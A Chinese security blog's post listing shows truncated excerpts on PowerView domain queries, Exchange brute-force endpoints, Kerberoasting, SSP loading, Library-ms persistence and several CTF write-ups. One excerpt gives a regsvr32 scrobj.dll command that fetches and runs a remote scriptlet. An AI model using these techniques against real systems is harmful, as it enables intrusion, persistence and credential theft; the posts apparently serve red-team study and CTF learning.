- 博客(12)
- 收藏
- 关注
RSS订阅原创 powerView--Get-NetDomain
获取域的有关信息filter Get-NetDomain {<# .SYNOPSIS Returns a given domain object. .PARAMETER Domain The domain name to query for, defaults to the current domain. .PARAMETER Cr...
2019-10-15 16:22:13
463
原创 无回显--查询进程存活情况
当我们无法获取回显判断进程是否存活的方法调用命令regsvr32 /s /n /u /i:<url/aa.sct> scrobj.dll<?XML version="1.0"?><scriptlet><registration progid="TESTING" classid="{A1112221-0000-0000-3000-000DA0...
2019-10-12 13:47:57
226
原创 Exchange可以拿来爆破的接口
Exchange可以拿来爆破的接口1、EWS 服务 URL,exchange web 服务配置https://192.168.88.129/ews/exchange.asmx2、还可以是owa接口–提供WEB方式邮件访问功能https://192.168.88.129/owa3、可以是AUTODISCOVER自动发现服务根据您是否在单独的站点上配置了自动发现服务,自动发现...
2019-10-09 16:42:02
2514
原创 看雪ctf晋级赛第十题wp
使用PEiD查看下是.net程序,这个程序是可以直接进行反编译的所以我们使用ILSpy进行反编译下,我们可以看到程序就是叫我们输入一个字符串,然后和Kanxue2019一起给传入a函数当中,算结果为4RTlF9Ca2+oqExJwx68FiA==所以下面我们看下a函数,ICryptoTransform是拿来做加密转换的,RijndaelManaged类是拿来做AES算法的一个类,...
2019-10-08 13:37:42
308
原创 看雪ctf晋级赛第六题wp
查看导出表,就一个main函数打开strings窗口,查看strings,可以看到下面是有很多字符串的程序运行,输出结果如下所示,所以我们需要去定位到这个字符串,看看是哪里调用的在我们的sub_4014C0当中被用到了查看伪代码如下所示scanf以后是sub_004012F0这个函数验证,验证从第8位开始之后的12位字符,要全部相等,然后以及我们输入的字符...
2019-10-08 13:28:49
354
原创 看雪ctf晋级赛第二题wp
安卓题目,应该就是有关动态库的题目了,所用对动态库进行分析,利用工具IDA、jeb、vs等利用IDA动态调试,对sub_784进行分析,可以确定其实就是是rc4加密算法,以及下面的进行编码的业务逻辑组成用到的其实就是RC4算法: 1、密钥流:RC4算法的关键是根据明文和密钥生成相应的密钥流,密钥流的长度和明文的长度是对应的,也就是说明文的长度是500字节,那么密钥流也是500字节。当然...
2019-10-08 13:19:24
537
原创 看雪ctf晋级赛第一题wp
利用中文引擎搜索搜索到Kanxuectf这一串字符串的所在,然后下断点之后就会发现它在和我们做比较,然后我们输入的26个大写的英文字母变成了下面的内容89opqrstuvwxyzOPQRSTUVWXYZm然后我们就找到了下面的对应关系,然后我们需要从右边的字符串当中找到KanXueCTF2019JustForhappy,对应的左边的字符串0 a1 b2 c3 d4 e5 f...
2019-10-08 13:17:11
241
原创 基于rpc调用-动态加载ssp
此篇文章结合学到的知识做个总结微软有个api为AddSecurityPackage,可以添加ssp,这里就看下其的实现逻辑,这里从将从公开这个 API 的 secur32.dll 这个 DLL 文件开始,主要为本人进行了修改以及自己去复现的总结在 Ghidra 打开这个 DLL 文件,这实际上只是一个调用 sspcli.dll 的包装器我们这边主要是看sspicli.dll的实现逻辑是...
2019-10-08 11:48:54
3218
2
原创 Library-Files-维持权限--对比自带CLSID打开程序
下面是3g老师的代码function Invoke-LibraryFilesPersistence{ <#.SYNOPSISFirst modify the registry and then create a file named Documents.library-ms in %appdata%\Microsoft\Windows\Start Menu\Programs\Acc...
2019-10-06 10:43:02
259
原创 IIS-扩展接口ISAPI-Filter分析
ISAPI 筛选器(ISAPI filter)导出函数1、BOOL WINAPI GetFilterVersion( PHTTP_FILTER_VERSION pVer);该函数是DLL筛选器第一次被加载到站点处理进程时被调用。2、DWORD WINAPI HttpFilterProc(PHTTP_FILTER_CONTEXT pfc,DWORD notificationType,LPVO...
2019-10-04 11:00:47
605
原创 屏幕截图--Take-ScreenShot分析
C#代码分析$code = @' using System; using System.Runtime.InteropServices; using System.Drawing; using System.Drawing.Imaging; namespace ScreenShotDemo { /// <summary> /// Provides functi...
2019-10-02 23:30:53
1648
原创 Kerberoast 工具集--查找域下的SPN--GetUserSPNs
代码如下所示# Edits by Tim Medin# File: GetUserSPNS.ps1# Contents: Query the domain to find SPNs that use User accounts# Comments: This is for use with Kerberoast https://github.com/nidem/kerberoast...
2019-10-02 21:34:24
1493
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人